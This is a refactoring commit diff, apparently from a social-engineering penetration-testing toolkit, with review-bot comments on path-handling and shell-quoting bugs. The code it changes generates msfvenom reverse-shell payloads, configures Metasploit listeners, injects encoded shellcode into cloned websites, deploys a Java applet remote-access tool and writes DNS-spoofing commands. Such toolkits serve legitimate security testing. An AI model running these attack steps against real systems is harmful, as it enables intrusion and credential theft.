Normalize user config path usage with string append and os.path.join().
parent
a4448ad242
commit
d719ebb8b8
28 changed files with 475 additions and 475 deletions
|
@ -35,7 +35,7 @@ except NameError:
|
|||
pass
|
||||
|
||||
definepath = os.getcwd()
|
||||
setdir = core.userconfigpath
|
||||
userconfigpath = core.userconfigpath
|
||||
|
||||
MAIN = " RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first"
|
||||
|
||||
|
@ -100,10 +100,10 @@ def java_applet_attack_tw(website, port, directory, ipaddr):
|
|||
############################################
|
||||
|
||||
# this part is needed to rename the msf.exe file to a randomly generated one
|
||||
if os.path.isfile(os.path.join(setdir, "/rand_gen")):
|
||||
if os.path.isfile(os.path.join(userconfigpath, "rand_gen")):
|
||||
# open the file
|
||||
# start a loop
|
||||
with open(os.path.join(setdir, "rand_gen")) as fileopen:
|
||||
with open(os.path.join(userconfigpath, "rand_gen")) as fileopen:
|
||||
for line in fileopen:
|
||||
# define executable name and rename it
|
||||
filename = line.rstrip()
|
||||
|
@ -111,7 +111,7 @@ def java_applet_attack_tw(website, port, directory, ipaddr):
|
|||
subprocess.Popen("cp src/payloads/ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory, filename), shell=True).wait()
|
||||
|
||||
# lastly we need to copy over the signed applet
|
||||
subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (setdir, directory), shell=True).wait()
|
||||
subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (userconfigpath, directory), shell=True).wait()
|
||||
|
||||
# TODO index.html parsen und IPADDR:Port ersetzen
|
||||
with open(os.path.join(directory, "index.html"), "rb") as fileopen:
|
||||
|
@ -148,7 +148,7 @@ def prepare_ratte(ipaddr, ratteport, persistent, customexe):
|
|||
############
|
||||
# PATCH Server IP into RATTE
|
||||
############
|
||||
with open(os.path.join(setdir, "ratteM.exe"), 'wb') as filewrite:
|
||||
with open(os.path.join(userconfigpath, "ratteM.exe"), 'wb') as filewrite:
|
||||
|
||||
host = (len(ipaddr) + 1) * "X"
|
||||
r_port = (len(str(ratteport)) + 1) * "Y"
|
||||
|
@ -271,10 +271,10 @@ def main():
|
|||
core.print_info("Starting java applet attack...")
|
||||
java_applet_attack_tw(website, javaport, "reports/", ipaddr)
|
||||
|
||||
with open(os.path.join(setdir, definepath, "/rand_gen")) as fileopen:
|
||||
with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen:
|
||||
for line in fileopen:
|
||||
ratte_random = line.rstrip()
|
||||
subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(setdir, definepath), definepath, ratte_random), shell=True).wait()
|
||||
subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait()
|
||||
|
||||
#######################
|
||||
# start ratteserver
|
||||
|
|
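Review bot: The `rand_gen` read in `main()` still passes an absolute component, `os.path.join(userconfigpath, definepath, "/rand_gen")`, so `os.path.join` discards everything before it and the open targets `/rand_gen` at the filesystem root. `definepath` is `os.getcwd()`, which is itself absolute and would already have displaced `userconfigpath`. The same commit corrects this pattern in `java_applet_attack_tw`, and if this is the same file the read should match it: `with open(os.path.join(userconfigpath, "rand_gen")) as fileopen:`. The `cp` on the following line builds its source from `os.path.join(userconfigpath, definepath)` although `prepare_ratte` writes `ratteM.exe` to `os.path.join(userconfigpath, "ratteM.exe")`, and it interpolates a value read from a file into a `shell=True` string; `shutil.copyfile` with joined paths would address both. `main()` continues outside the hunk.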
2
seproxy
2
seproxy
|
@ -45,7 +45,7 @@ if operating_system == "posix":
|
|||
else:
|
||||
proxy_string = "export http_proxy='http://{0}'".format(proxy)
|
||||
|
||||
with open(os.path.join(core.userconfigpath, "/proxy.config"), "w") as filewrite:
|
||||
with open(os.path.join(core.userconfigpath, "proxy.config"), "w") as filewrite:
|
||||
filewrite.write(proxy_string)
|
||||
|
||||
def kill_proc(port, flag):
|
||||
|
|
|
@ -33,11 +33,11 @@ if os.path.isfile(os.path.join(core.userconfigpath, "fileformat.file")):
|
|||
os.path.join(core.userconfigpath, "template.pdf")),
|
||||
shell=True).wait()
|
||||
|
||||
if os.path.isfile(os.path.join(core.userconfigpath, "/dll/openthis.wab")):
|
||||
if os.path.isfile(os.path.join(core.userconfigpath, "dll/openthis.wab")):
|
||||
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
|
||||
"mkdir {0} 1> /dev/null 2> /dev/null;"
|
||||
"cp {1} {0} 1> /dev/null 2> /dev/null".format(autorun_path,
|
||||
os.path.join(core.userconfigpath, "/dll/*")),
|
||||
os.path.join(core.userconfigpath, "dll/*")),
|
||||
shell=True).wait()
|
||||
trigger = 3
|
||||
|
||||
|
|
|
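Review bot: The cleanup command interpolates `autorun_path` unquoted into `rm -rf {0}` under `shell=True`. Its value is set outside this hunk, so an empty string or a path containing spaces or shell metacharacters would make the `rm -rf` act on something other than the intended directory. The three shell steps map onto the standard library: `shutil.rmtree(autorun_path, ignore_errors=True)`, `os.makedirs(autorun_path)`, and a `shutil.copy` for each entry of `glob.glob(os.path.join(core.userconfigpath, "dll", "*"))`, provided the module imports `shutil` and `glob`. That also removes the reliance on the shell to expand `dll/*`.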
@ -105,7 +105,7 @@ if ettercapchoice == 'y':
|
|||
# spawn a child process
|
||||
os.chdir(cwd)
|
||||
time.sleep(5)
|
||||
filewrite = open(setdir + "/ettercap", "w")
|
||||
filewrite = open(userconfigpath + "ettercap", "w")
|
||||
filewrite.write(
|
||||
"ettercap -T -q -i %s -P dns_spoof %s %s // //" % (interface, arp, bridge))
|
||||
filewrite.close()
|
||||
|
@ -147,8 +147,8 @@ if dsniffchoice == 'y':
|
|||
if dns_spoof == "":
|
||||
dns_spoof = "*"
|
||||
subprocess.Popen(
|
||||
"rm %s/dnsspoof.conf 1> /dev/null 2> /dev/null" % (setdir), shell=True).wait()
|
||||
filewrite = open(setdir + "/dnsspoof.conf", "w")
|
||||
"rm %s/dnsspoof.conf 1> /dev/null 2> /dev/null" % (userconfigpath), shell=True).wait()
|
||||
filewrite = open(userconfigpath + "dnsspoof.conf", "w")
|
||||
filewrite.write("%s %s" % (ipaddr, dns_spoof))
|
||||
filewrite.close()
|
||||
print_error("LAUNCHING DNSSPOOF DNS_SPOOF ATTACK!")
|
||||
|
@ -160,10 +160,10 @@ if dsniffchoice == 'y':
|
|||
gateway = subprocess.Popen("netstat -rn|grep %s|awk '{print $2}'| awk 'NR==2'" % (
|
||||
interface), shell=True, stdout=subprocess.PIPE).communicate()[0]
|
||||
# open file for writing
|
||||
filewrite = open(setdir + "/ettercap", "w")
|
||||
filewrite = open(userconfigpath + "ettercap", "w")
|
||||
# write the arpspoof / dnsspoof commands to file
|
||||
filewrite.write(
|
||||
"arpspoof %s | dnsspoof -f %s/dnsspoof.conf" % (gateway, setdir))
|
||||
"arpspoof %s | dnsspoof -f %s/dnsspoof.conf" % (gateway, userconfigpath))
|
||||
# close the file
|
||||
filewrite.close()
|
||||
# change back to normal directory
|
||||
|
|
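Review bot: The new paths are built two ways in the same file: `userconfigpath + "ettercap"` and `userconfigpath + "dnsspoof.conf"` are only correct if `userconfigpath` always ends in a path separator, while `"rm %s/dnsspoof.conf"` and `"dnsspoof -f %s/dnsspoof.conf"` add their own `/`. If the value ever arrives without the trailing separator (not verifiable from this page), the concatenated form writes `<dir>ettercap` beside the config directory instead of inside it, with no error. Using `os.path.join(userconfigpath, "ettercap")` throughout, as the commit title suggests, removes that dependency. The same mix of `userconfigpath + "…"` and `"%s/…" % (userconfigpath)` recurs in the later file sections of this commit. The `rm … shell=True` call can also become an `os.remove` guarded by `os.path.isfile`.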
|
@ -263,7 +263,7 @@ try:
|
|||
# specify we are using the fasttrack
|
||||
# option, this disables some features
|
||||
filewrite = open(
|
||||
setdir + "/fasttrack.options", "w")
|
||||
userconfigpath + "fasttrack.options", "w")
|
||||
filewrite.write("none")
|
||||
filewrite.close()
|
||||
# import fasttrack
|
||||
|
@ -439,10 +439,10 @@ try:
|
|||
# if we are using the built in one
|
||||
if dict == "":
|
||||
# write out a file
|
||||
filewrite = open(setdir + "/dictionary.txt", "w")
|
||||
filewrite = open(userconfigpath + "dictionary.txt", "w")
|
||||
filewrite.write("\nPassword1\nPassword!\nlc username")
|
||||
# specify the path
|
||||
dict = setdir + "/dictionary.txt"
|
||||
dict = userconfigpath + "dictionary.txt"
|
||||
filewrite.close()
|
||||
|
||||
# if we are not brute forcing
|
||||
|
|
|
@ -53,27 +53,27 @@ attack_vector = 0
|
|||
linosx = 0
|
||||
multiattack = ""
|
||||
# grab attack vector
|
||||
if os.path.isfile(setdir + "/attack_vector"):
|
||||
fileopen = open(setdir + "/attack_vector", "r")
|
||||
if os.path.isfile(userconfigpath + "attack_vector"):
|
||||
fileopen = open(userconfigpath + "attack_vector", "r")
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
if line == "java":
|
||||
attack_vector = "java"
|
||||
if line == "multiattack":
|
||||
attack_vector = "multiattack"
|
||||
multiattack = open(setdir + "/multi_payload", "w")
|
||||
multiattack = open(userconfigpath + "multi_payload", "w")
|
||||
|
||||
# here is a place holder for the multi attack java
|
||||
# multiattack outputs a file called multi_java if
|
||||
# this file is present it will allow additional
|
||||
# functionality
|
||||
multiattack_java = "off"
|
||||
if os.path.isfile(setdir + "/multi_java"):
|
||||
if os.path.isfile(userconfigpath + "multi_java"):
|
||||
multiattack_java = "on"
|
||||
|
||||
# custom payloadgen
|
||||
payloadgen = "regular"
|
||||
if os.path.isfile(setdir + "/payloadgen"):
|
||||
if os.path.isfile(userconfigpath + "payloadgen"):
|
||||
payloadgen = "solo"
|
||||
|
||||
#
|
||||
|
@ -117,8 +117,8 @@ try:
|
|||
choice1 = ""
|
||||
# this is port
|
||||
choice3 = ""
|
||||
if os.path.isfile(setdir + "/meterpreter_reverse_tcp_exe"):
|
||||
fileopen = open(setdir + "/meterpreter_reverse_tcp_exe", "r")
|
||||
if os.path.isfile(userconfigpath + "meterpreter_reverse_tcp_exe"):
|
||||
fileopen = open(userconfigpath + "meterpreter_reverse_tcp_exe", "r")
|
||||
for line in fileopen:
|
||||
# this reads in the first line of the file which happens to be port
|
||||
# when calling through core
|
||||
|
@ -182,7 +182,7 @@ try:
|
|||
encoder = 'false'
|
||||
payloadgen = 'solo'
|
||||
encode_stop = 1
|
||||
filewrite = open(setdir + "/set.payload", "w")
|
||||
filewrite = open(userconfigpath + "set.payload", "w")
|
||||
# select setshell
|
||||
if choice1 == '3':
|
||||
filewrite.write("SETSHELL")
|
||||
|
@ -217,11 +217,11 @@ try:
|
|||
|
||||
# if we are using our own executable
|
||||
if custom == 1:
|
||||
check_write = open(setdir + "/custom.exe", "w")
|
||||
check_write = open(userconfigpath + "custom.exe", "w")
|
||||
check_write.write("VALID")
|
||||
check_write.close()
|
||||
shutil.copyfile("%s" % (choice1), "msf.exe")
|
||||
shutil.copyfile("msf.exe", setdir + "/msf.exe")
|
||||
shutil.copyfile("msf.exe", userconfigpath + "msf.exe")
|
||||
|
||||
# Specify Encoding Option
|
||||
encoder = "false"
|
||||
|
@ -232,12 +232,12 @@ try:
|
|||
if choice1 != "set/reverse_shell":
|
||||
# we need to rewrite index.html real quick because it has a parameter
|
||||
# that could get confusing
|
||||
if os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
fileopen = open(userconfigpath + "web_clone/index.html", "r")
|
||||
data = fileopen.read()
|
||||
data = data.replace("freehugs", "")
|
||||
os.remove(setdir + "/web_clone/index.html")
|
||||
filewrite = open(setdir + "/web_clone/index.html", "w")
|
||||
os.remove(userconfigpath + "web_clone/index.html")
|
||||
filewrite = open(userconfigpath + "web_clone/index.html", "w")
|
||||
filewrite.write(data)
|
||||
filewrite.close()
|
||||
|
||||
|
@ -276,7 +276,7 @@ try:
|
|||
# if we are using the SET interactive shell then do this
|
||||
if choice1 == "set/reverse_shell":
|
||||
encoder = "false"
|
||||
filewrite = open(setdir + "/set.payload.posix", "w")
|
||||
filewrite = open(userconfigpath + "set.payload.posix", "w")
|
||||
filewrite.write("true")
|
||||
filewrite.close()
|
||||
import src.core.payloadprep
|
||||
|
@ -330,7 +330,7 @@ try:
|
|||
|
||||
if choice1 == "shellcode/alphanum":
|
||||
print_status("Generating the payload via msfvenom and generating alphanumeric shellcode...")
|
||||
subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, setdir), shell=True).wait()
|
||||
subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, userconfigpath), shell=True).wait()
|
||||
|
||||
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject" or choice1 == "cmd/multi":
|
||||
# here we update set options to specify pyinjection and multipy
|
||||
|
@ -339,16 +339,16 @@ try:
|
|||
# define, this will eventually be all of our payloads
|
||||
multipyinject_payload = ""
|
||||
# clean up old file
|
||||
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
os.remove("%s/meta_config_multipyinjector" % (setdir))
|
||||
if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
|
||||
os.remove("%s/meta_config_multipyinjector" % (userconfigpath))
|
||||
|
||||
# remove any old payload options
|
||||
if os.path.isfile(setdir + "/payload.options.shellcode"):
|
||||
os.remove(setdir + "/payload_options.shellcode")
|
||||
if os.path.isfile(userconfigpath + "payload.options.shellcode"):
|
||||
os.remove(userconfigpath + "payload_options.shellcode")
|
||||
|
||||
# this is the file that gets saved with the payload and
|
||||
# port options
|
||||
if choice1 != "cmd/multi": payload_options = open(setdir + "/payload_options.shellcode", "a")
|
||||
if choice1 != "cmd/multi": payload_options = open(userconfigpath + "payload_options.shellcode", "a")
|
||||
|
||||
while 1:
|
||||
# don't need any options here
|
||||
|
@ -385,8 +385,8 @@ try:
|
|||
|
||||
# here we prep our meta config to listen on all
|
||||
# the ports we want - free hugs all around
|
||||
filewrite = open("%s/meta_config_multipyinjector" % (setdir), "a")
|
||||
port_check = check_ports("%s/meta_config_multipyinjector" % (setdir), shellcode_port)
|
||||
filewrite = open("%s/meta_config_multipyinjector" % (userconfigpath), "a")
|
||||
port_check = check_ports("%s/meta_config_multipyinjector" % (userconfigpath), shellcode_port)
|
||||
if port_check == False:
|
||||
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset EnableStageEncoding %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (choice9, stage_encoding, ipaddr, shellcode_port))
|
||||
filewrite.close()
|
||||
|
@ -453,7 +453,7 @@ try:
|
|||
shellcode = encryptAES(secret, multipyinject_payload)
|
||||
print_status("Dynamic cipher key created and embedded into payload.")
|
||||
|
||||
filewrite = open("%s/meterpreter.alpha_decoded" % (setdir), "w")
|
||||
filewrite = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "w")
|
||||
filewrite.write(shellcode)
|
||||
filewrite.close()
|
||||
|
||||
|
@ -462,7 +462,7 @@ try:
|
|||
payload_options.close()
|
||||
|
||||
# here we are going to encode the payload via base64
|
||||
fileopen = open("%s/meterpreter.alpha_decoded" % (setdir), "r")
|
||||
fileopen = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "r")
|
||||
data = fileopen.read()
|
||||
if payloadgen != "solo":
|
||||
# base64 1
|
||||
|
@ -489,7 +489,7 @@ try:
|
|||
# last one
|
||||
data = base64.b64encode(b'data')
|
||||
#
|
||||
filewrite = open("%s/meterpreter.alpha" % (setdir), "w")
|
||||
filewrite = open("%s/meterpreter.alpha" % (userconfigpath), "w")
|
||||
filewrite.write(str(data))
|
||||
filewrite.close()
|
||||
if choice1 == "shellcode/alphanum":
|
||||
|
@ -510,17 +510,17 @@ try:
|
|||
|
||||
# write out the payload
|
||||
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyiject":
|
||||
filewrite = open(setdir + "/msf.exe", "wb")
|
||||
filewrite = open(userconfigpath + "msf.exe", "wb")
|
||||
filewrite.write(fileopen)
|
||||
filewrite.close()
|
||||
|
||||
subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait()
|
||||
subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
|
||||
# we need to read in the old index.html file because its
|
||||
# already generated, need to present the alphanum to it
|
||||
if os.path.isfile("%s/web_clone/index.html" % (setdir)):
|
||||
fileopen = open("%s/web_clone/index.html" %(setdir), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w")
|
||||
fileopen2 = open("%s/meterpreter.alpha" % (setdir), "r")
|
||||
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
|
||||
fileopen = open("%s/web_clone/index.html" %(userconfigpath), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
|
||||
fileopen2 = open("%s/meterpreter.alpha" % (userconfigpath), "r")
|
||||
alpha_shellcode = fileopen2.read().rstrip()
|
||||
data = fileopen.read()
|
||||
data = data.replace(
|
||||
|
@ -539,7 +539,7 @@ try:
|
|||
if choice1 == "shellcode/pyinject":
|
||||
print_status("Prepping website for pyInjector shellcode injection..")
|
||||
print_status("Base64 encoding shellcode and prepping for delivery..")
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait()
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
|
||||
if choice9 == "windows/meterpreter/reverse_tcp_allports":
|
||||
portnum = "LPORT=1"
|
||||
choice3 = "1"
|
||||
|
@ -551,7 +551,7 @@ try:
|
|||
choice1 = choice9
|
||||
|
||||
# write out the payload for powershell injection to pick it up if used
|
||||
filewrite = open(setdir + "/metasploit.payload", "w")
|
||||
filewrite = open(userconfigpath + "metasploit.payload", "w")
|
||||
filewrite.write(choice1)
|
||||
filewrite.close()
|
||||
# import if on
|
||||
|
@ -563,12 +563,12 @@ try:
|
|||
setshell_counter = 1
|
||||
if setshell_counter == 0:
|
||||
if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
|
||||
if os.path.isfile("%s/web_clone/index.html" % (setdir)):
|
||||
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
|
||||
if choice1 != "cmd/multi":
|
||||
try: core.module_reload(src.payloads.powershell.prep)
|
||||
except: import src.payloads.powershell.prep
|
||||
if os.path.isfile("%s/x86.powershell" % (setdir)):
|
||||
fileopen1 = open("%s/x86.powershell" % (setdir), "r")
|
||||
if os.path.isfile("%s/x86.powershell" % (userconfigpath)):
|
||||
fileopen1 = open("%s/x86.powershell" % (userconfigpath), "r")
|
||||
x86 = fileopen1.read()
|
||||
x86 = "powershell -ec " + x86
|
||||
|
||||
|
@ -586,8 +586,8 @@ try:
|
|||
print_status("Embedding commands into Java Applet parameters...")
|
||||
print_status("Note that these will be base64-encoded once, regardless of the payload..")
|
||||
|
||||
fileopen3 = open("%s/web_clone/index.html" % (setdir), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w")
|
||||
fileopen3 = open("%s/web_clone/index.html" % (userconfigpath), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
|
||||
data = fileopen3.read()
|
||||
|
||||
# encode once, will need to decode later
|
||||
|
@ -605,19 +605,19 @@ try:
|
|||
|
||||
filewrite.write(data)
|
||||
filewrite.close()
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), stdout=subprocess.PIPE, shell=True).wait()
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, shell=True).wait()
|
||||
|
||||
# here we specify the binary to deploy if we are using ones that are
|
||||
# required to drop binaries
|
||||
if custom == 1 or choice1 == "set/reverse_shell" or choice1 == "shellcode/alphanum" or choice1 == "cmd/multi":
|
||||
fileopen3 = fileopen = open("%s/web_clone/index.html" % (setdir), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w")
|
||||
fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
|
||||
data = fileopen3.read()
|
||||
# check if we don't want to deploy binaries
|
||||
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
|
||||
filewrite.write(data)
|
||||
filewrite.close()
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
|
||||
|
||||
# specify attack vector as SET interactive shell
|
||||
if choice1 == "set/reverse_shell":
|
||||
|
@ -657,7 +657,7 @@ try:
|
|||
|
||||
if osx_path != "":
|
||||
# copy the payload
|
||||
shutil.copyfile(osx_path, setdir + "/mac.bin")
|
||||
shutil.copyfile(osx_path, userconfigpath + "mac.bin")
|
||||
|
||||
# if linux payload
|
||||
if lin_path != "":
|
||||
|
@ -672,7 +672,7 @@ try:
|
|||
|
||||
if lin_path != "":
|
||||
# copy the payload
|
||||
shutil.copyfile(lin_path, setdir + "/nix.bin")
|
||||
shutil.copyfile(lin_path, userconfigpath + "nix.bin")
|
||||
|
||||
else:
|
||||
|
||||
|
@ -680,9 +680,9 @@ try:
|
|||
osxpayload = check_config("OSX_PAYLOAD_DELIVERY=")
|
||||
linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=")
|
||||
print_status("Generating OSX payloads through Metasploit...")
|
||||
subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
print_status("Generating Linux payloads through Metasploit...")
|
||||
subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
if multiattack_java == "on":
|
||||
multiattack.write("OSX=" + str(port1) + "\n")
|
||||
multiattack.write("OSXPAYLOAD=%s\n" % (osxpayload))
|
||||
|
@ -691,24 +691,24 @@ try:
|
|||
|
||||
osxcheck = check_options("MAC.BIN=")
|
||||
linuxcheck = check_options("NIX.BIN=")
|
||||
shutil.copyfile(setdir + "/mac.bin", setdir + "/web_clone/%s" % (osxcheck))
|
||||
shutil.copyfile(setdir + "/nix.bin", setdir + "/web_clone/%s" % (linuxcheck))
|
||||
shutil.copyfile(userconfigpath + "mac.bin", userconfigpath + "web_clone/%s" % (osxcheck))
|
||||
shutil.copyfile(userconfigpath + "nix.bin", userconfigpath + "web_clone/%s" % (linuxcheck))
|
||||
|
||||
# try block here
|
||||
try:
|
||||
# if they want a listener, start here
|
||||
if os.path.isfile("%s/meta_config" % (setdir)):
|
||||
if os.path.isfile("%s/meta_config" % (userconfigpath)):
|
||||
# if its already created
|
||||
filewrite = open("%s/meta_config" % (setdir), "a")
|
||||
filewrite = open("%s/meta_config" % (userconfigpath), "a")
|
||||
|
||||
if not os.path.isfile("%s/meta_config" % (setdir)):
|
||||
if not os.path.isfile("%s/meta_config" % (userconfigpath)):
|
||||
# if we need to create it
|
||||
filewrite = open("%s/meta_config" % (setdir), "w")
|
||||
filewrite = open("%s/meta_config" % (userconfigpath), "w")
|
||||
|
||||
# if there isn't a multiattack metasploit, setup handler
|
||||
if not os.path.isfile("%s/multi_meta" % (setdir)):
|
||||
if not os.path.isfile("%s/multi_meta" % (userconfigpath)):
|
||||
|
||||
port_check = check_ports("%s/meta_config" % (setdir), choice3)
|
||||
port_check = check_ports("%s/meta_config" % (userconfigpath), choice3)
|
||||
if port_check == False:
|
||||
filewrite.write("use exploit/multi/handler\n")
|
||||
filewrite.write("set PAYLOAD " + choice1 + "\n")
|
||||
|
@ -726,10 +726,10 @@ try:
|
|||
|
||||
# config option for using multiscript meterpreter
|
||||
if meterpreter_multi == "ON":
|
||||
multiwrite = open(setdir + "/multi_meter.file", "w")
|
||||
multiwrite = open(userconfigpath + "multi_meter.file", "w")
|
||||
multiwrite.write(meterpreter_multi_command)
|
||||
filewrite.write(
|
||||
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir))
|
||||
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath))
|
||||
multiwrite.close()
|
||||
filewrite.write("exploit -j\r\n\r\n")
|
||||
|
||||
|
@ -759,10 +759,10 @@ try:
|
|||
filewrite.write("set LPORT " + port2 + "\n")
|
||||
if linux_meterpreter_multi == "ON":
|
||||
multiwrite = open(
|
||||
setdir + "/lin_multi_meter.file", "w")
|
||||
userconfigpath + "lin_multi_meter.file", "w")
|
||||
multiwrite.write(linux_meterpreter_multi_command)
|
||||
filewrite.write(
|
||||
"set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (setdir))
|
||||
"set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (userconfigpath))
|
||||
multiwrite.close()
|
||||
filewrite.write("set ExitOnSession false\n")
|
||||
filewrite.write("exploit -j\r\n\r\n")
|
||||
|
@ -781,11 +781,11 @@ except KeyboardInterrupt:
|
|||
# finish closing up the remenant files
|
||||
if attack_vector == "multiattack":
|
||||
multiattack.close()
|
||||
if os.path.isfile("%s/fileformat.file" % (setdir)):
|
||||
filewrite = open("%s/payload.options" % (setdir), "w")
|
||||
if os.path.isfile("%s/fileformat.file" % (userconfigpath)):
|
||||
filewrite = open("%s/payload.options" % (userconfigpath), "w")
|
||||
filewrite.write(choice1 + " " + ipaddr + " " + choice3)
|
||||
filewrite.close()
|
||||
|
||||
if choice1 == "set/reverse_shell":
|
||||
if os.path.isfile(setdir + "/meta_config"):
|
||||
os.remove(setdir + "/meta_config")
|
||||
if os.path.isfile(userconfigpath + "meta_config"):
|
||||
os.remove(userconfigpath + "meta_config")
|
||||
|
|
|
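Review bot: The stale-options cleanup tests one filename and deletes another: `os.path.isfile(userconfigpath + "payload.options.shellcode")` guards `os.remove(userconfigpath + "payload_options.shellcode")`. The file opened for append a few lines later is `payload_options.shellcode`, so the guard is most likely never true and entries from an earlier run stay in the file. If the dotted name did exist, the `os.remove` could raise because the underscored file may be absent. The commit carries the mismatch over unchanged; the guard should read `if os.path.isfile(userconfigpath + "payload_options.shellcode"):`. The enclosing `try:` block starts and ends outside the hunk.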
@ -16,14 +16,14 @@ meta_path = meta_path()
|
|||
def payload_generate(payload, lhost, port):
|
||||
# generate metasploit
|
||||
subprocess.Popen(meta_path + "msfvenom -p %s LHOST=%s LPORT=%s --format=exe > %s/payload.exe" %
|
||||
(payload, lhost, port, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
|
||||
(payload, lhost, port, userconfigpath), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
|
||||
# write out the rc file
|
||||
filewrite = open(setdir + "/meta_config", "w")
|
||||
filewrite = open(userconfigpath + "meta_config", "w")
|
||||
filewrite.write(
|
||||
"use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (payload, lhost, port))
|
||||
filewrite.close()
|
||||
print_status(
|
||||
"Payload has been exported to the default SET directory located under: " + setdir + "/payload.exe")
|
||||
"Payload has been exported to the default SET directory located under: " + userconfigpath + "payload.exe")
|
||||
|
||||
show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2)
|
||||
payload = (raw_input(setprompt(["4"], "")))
|
||||
|
@ -49,4 +49,4 @@ if check_options("INFECTION_MEDIA=") != "ON":
|
|||
print_status(
|
||||
"Launching msfconsole, this could take a few to load. Be patient...")
|
||||
subprocess.Popen(meta_path + "msfconsole -r " +
|
||||
setdir + "/meta_config", shell=True).wait()
|
||||
userconfigpath + "meta_config", shell=True).wait()
|
||||
|
|
|
@ -43,12 +43,12 @@ for line in fileopen:
|
|||
"\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config")
|
||||
|
||||
# make directory if it's not there
|
||||
if not os.path.isdir(setdir + "/web_clone/"):
|
||||
os.makedirs(setdir + "/web_clone/")
|
||||
